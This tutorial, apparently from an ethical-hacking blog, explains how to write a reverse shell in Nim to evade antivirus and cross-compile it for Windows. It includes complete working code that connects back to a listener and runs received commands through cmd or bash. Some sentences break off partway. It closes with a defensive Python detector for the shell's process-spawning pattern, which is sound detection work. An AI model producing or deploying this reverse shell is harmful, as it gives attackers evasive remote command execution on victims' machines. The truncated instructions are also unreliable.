In this tutorial, you will learn how to write a reverse shell in Nim to bypass antivirus detection.
What Is Nim?
Nim is a scripting language with syntax similar to Python, but closer to Golang in that it is statically typed and compiles its programs to native binaries.
Why Use Nim?
Whatever you think of Python or Golang, Nim is worth looking at for offensive programming:
- Very mature FFI (Foreign Function Interface)
- Smaller compiled binaries than Golang (KBs versus 200+ KB)
- Cross-compilation support with mingw-w64, similar to Golang
- Can call the Windows API directly via the FFI
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Here’s What You Need
- Kali Linux VM
- Windows 10 VM
Once you have installed Nim in Kali Linux, you can compile the program like so:
Write A Reverse Shell In Nim
A reverse shell is a good way to get started in writing offensive tooling in Nim. The syntax will be similar to Python, but more efficient in execution like Golang. Get the code for the reverse shell from The Ethical Hacking Guru Github.
You will not need to download any additional modules to run this code.
```nim
import os, net, osproc

var sock = newSocket()

# Connect back to TARGET:RPORT, then read one command per line and return
# its output. The `when` blocks are compile-time branches, so only the code
# for the OS the binary was compiled for ends up in the executable.
proc run(TARGET: string, RPORT: int): void =
  when system.hostOS == "macosx":
    echo "running on Mac OS X!"
    try:
      sock.connect(TARGET, Port(RPORT))
      while true:
        let cmd = sock.recvLine()
        if cmd == "exit":
          break
        let output = execProcess("bash -c " & cmd)
        sock.send(output)
    except:
      raise
    finally:
      sock.close()
  when system.hostOS == "windows":
    echo "running on Windows!"
    try:
      sock.connect(TARGET, Port(RPORT))
      while true:
        let cmd = sock.recvLine()
        if cmd == "exit":
          break
        let output = execProcess("cmd /c " & cmd)
        sock.send(output)
    except:
      raise
    finally:
      sock.close()

when isMainModule:
  try:
    let RPORT = 443
    let TARGET = paramStr(1)   # listener address is the first command-line argument
    run(TARGET, RPORT)
  except:
    raise
```
The code is pretty simple. Nim is statically typed, which means you have to declare a variable's type when you declare it for the first time. `proc` means you are defining a function, and it requires the return type too, see
The
Cross-compiling from Linux to Windows is simple: all you need to do is download the mingw-w64 binary with
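From the defender's side, the shell above has a noisy shape whether or not antivirus flags the binary: one process holds an outbound TCP connection (port 443 here) and spawns a fresh `cmd /c` or `bash -c` child for every command it receives. The following Python is an added example, not code from this tutorial or its GitHub repository; it correlates constructed, simplified Sysmon-style process-create and network-connect records (the field names are assumptions, not Sysmon's real schema) and flags parents that show that pattern.

```python
import re
from collections import defaultdict

# Matches the two spawn patterns the tutorial's shell uses: "cmd /c <cmd>" on
# Windows and "bash -c <cmd>" elsewhere, with or without a path or .exe suffix.
SHELL_SPAWN = re.compile(r'^\s*"?(?:.*[\\/])?(?:cmd(?:\.exe)?"?\s+/c|bash"?\s+-c)\s',
                         re.IGNORECASE)

# Constructed sample telemetry (assumed field names, not real events):
# "network" = an outbound connection by pid, "process" = a process creation.
SAMPLE_EVENTS = [
    {"type": "network", "pid": 4321, "image": r"C:\Users\a\rs.exe", "dst_port": 443},
    {"type": "process", "pid": 5555, "parent_pid": 4321, "command_line": "cmd /c whoami"},
    {"type": "process", "pid": 5556, "parent_pid": 4321, "command_line": "cmd /c ipconfig"},
    {"type": "process", "pid": 5557, "parent_pid": 4321, "command_line": "notepad.exe"},
    {"type": "network", "pid": 7001, "image": r"C:\Program Files\Browser\browser.exe", "dst_port": 443},
    {"type": "process", "pid": 7002, "parent_pid": 7001, "command_line": "cmd.exe /c ver"},
    {"type": "process", "pid": 8000, "parent_pid": 1234, "command_line": "cmd /c dir"},
]


def find_shell_beacons(events, min_children=2):
    """Return {parent_pid: [command lines]} for every process that both made an
    outbound connection and spawned at least min_children shell-wrapped children.
    The threshold separates the command loop of a reverse shell (one child per
    received command) from a legitimate program running a single helper."""
    outbound = {e["pid"] for e in events if e["type"] == "network"}
    spawned = defaultdict(list)
    for e in events:
        if e["type"] != "process" or e["parent_pid"] not in outbound:
            continue
        if SHELL_SPAWN.match(e["command_line"]):
            spawned[e["parent_pid"]].append(e["command_line"])
    return {pid: cmds for pid, cmds in spawned.items() if len(cmds) >= min_children}


if __name__ == "__main__":
    for pid, cmds in find_shell_beacons(SAMPLE_EVENTS).items():
        print(f"pid {pid} holds an outbound connection and ran shell children: {cmds}")
```

With the default threshold only the beaconing parent (pid 4321) is reported; lowering `min_children` to 1 also surfaces the browser that ran a single `cmd.exe /c`, which is the false-positive trade-off of this rule.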